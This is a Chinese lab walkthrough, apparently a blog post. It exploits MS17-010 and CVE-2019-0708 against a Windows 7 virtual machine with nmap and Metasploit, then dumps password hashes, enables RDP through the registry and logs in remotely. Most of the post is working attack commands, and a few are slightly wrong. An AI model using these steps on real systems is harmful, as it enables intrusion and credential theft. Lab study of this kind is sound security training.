Win7 sp 1的ms17-010和CVE-2019-0708漏洞利用

环境搭建

kali
windows 7 sp 1:链接:https://pan.baidu.com/s/1AdimIwMPdg8Wf8FUeJbx2w?pwd=jfgh
win7的登录账号和密码为root:root
注意:如果nmap扫描不出东西,请登录到win7关闭它的防火墙
先让靶机与kali处于同一个网段
在这里插入图片描述

一、ms17-010漏洞利用

1.信息收集

ip add #查看kali的ip地址

在这里插入图片描述

arp-scan -l #查看局域网中所有ip

得到靶机ip为10.10.10.141
在这里插入图片描述

nmap -A -sV 10.10.10.141 #扫描靶机的所有信息和版本信息

得到靶机操作系统为Windows7
在这里插入图片描述

nmap --script=vuln 10.10.10.141 #使用namp对靶机进行已知漏洞探测
#--script可以指定脚本
#vuln脚本包含了许多已知漏洞

我们可以知道靶机存在ms17-010漏洞
在这里插入图片描述

2.漏洞利用

msfconsole #开启msf

在这里插入图片描述

search ms17-010 #查找ms17-010相关模块

在这里插入图片描述
在前面信息收集中,我们可以知道靶机开放了445端口存在smb服务,且靶机是Windows系统,使用我们使用id为0的攻击模块

use 0 #使用模块
show missing #查看必须配置的参数
set rhosts 10.10.10.141 #配置靶机IP

在这里插入图片描述
主要的配置完了,我们查看全部配置参数,来设置payload模块和target模块

show options #查看所有配置参数

在这里插入图片描述

show payloads #查看payload模块

我们知道靶机是Windows系统,我们需要靶机反向TCP连接。

set payload/windows/x64/meterpreter/reverse_tcp
# meterpreter是一种在目标系统上实现远程控制和管理功能强大的后门工具。
# reverse_tcp 反向TCP连接

在这里插入图片描述

set payload 31 #就是使用payload/windows/x64/meterpreter/reverse_tcp
#31 是模块对应的数字

在这里插入图片描述
设置靶机的系统版本,我们在前面已经知道靶机是windows7了
在这里插入图片描述
直接设置target。然后开始攻击
在这里插入图片描述
进入shell
在这里插入图片描述

hashdump #获取所有用户的密码

这个密码都是被进行了加密。
在这里插入图片描述
md5在线解密:https://www.cmd5.com/default.aspx
直接解密root用户的密码,得到root用户的密码为root
在这里插入图片描述

REG ADD HKLE\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal: 这是用于添加(或修改)注册表键值的命令,其中HKLM\SYSTEM\CurrentControlSet\Control\Terminal是注册表的路径,表示要修改的注册表项的位置。
#/v fDenyTSConnections: 这是指定要添加(或修改)的注册表项的名称,fDenyTSConnections是要修改的注册表项的名称。
#/t REG_DWORD: 这是指定要添加的数据类型,REG_DWORD表示这是一个32位的DWORD值。
#/d 00000000: 这是指定要添加(或修改)的值,00000000表示开启远程终端服务连接。
#/f: 这是一个强制选项,表示在遇到任何错误时都应强制执行操作。
netstat -an #查看靶机开放的端口

在这里插入图片描述

rdesktop 10.10.10.141 #远程到靶机

在这里插入图片描述

二、CVE-2019-0708漏洞利用

nmap -sV -Pn 10.10.10.141
#-sV 版本检测
#-Pn no ping扫描

发现已经开放了远程桌面服务
在这里插入图片描述
用nessus扫描靶机得到CVE-2019-0708漏洞
在这里插入图片描述

msfconsole #开启msf
search CVE-2019-0708 #寻找相关漏洞模块

在这里插入图片描述
得到auxiliary(辅助模块)exploit(攻击模块),先使用辅助模块判断漏洞是否存在
在这里插入图片描述
发现存在漏洞后,使用攻击模块
在这里插入图片描述

set rhosts 10.10.10.141 #设置靶机ip
set payload windows/x64/meterpreter/bind_tcp #使用反向tcp连接的攻击payload
set target 5 #通过实际情况选择
run # 攻击

在这里插入图片描述
在这里插入图片描述
得到shell
在这里插入图片描述
=--------------------------------------------------------------------------------------------------------------------=
总结
漏洞利用的一般步骤:
1.信息收集获取靶机的ip,系统版本,开放端口,可能存在漏洞
2.用msf使用漏洞,设置相应的pyload,target,最后开始攻击

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值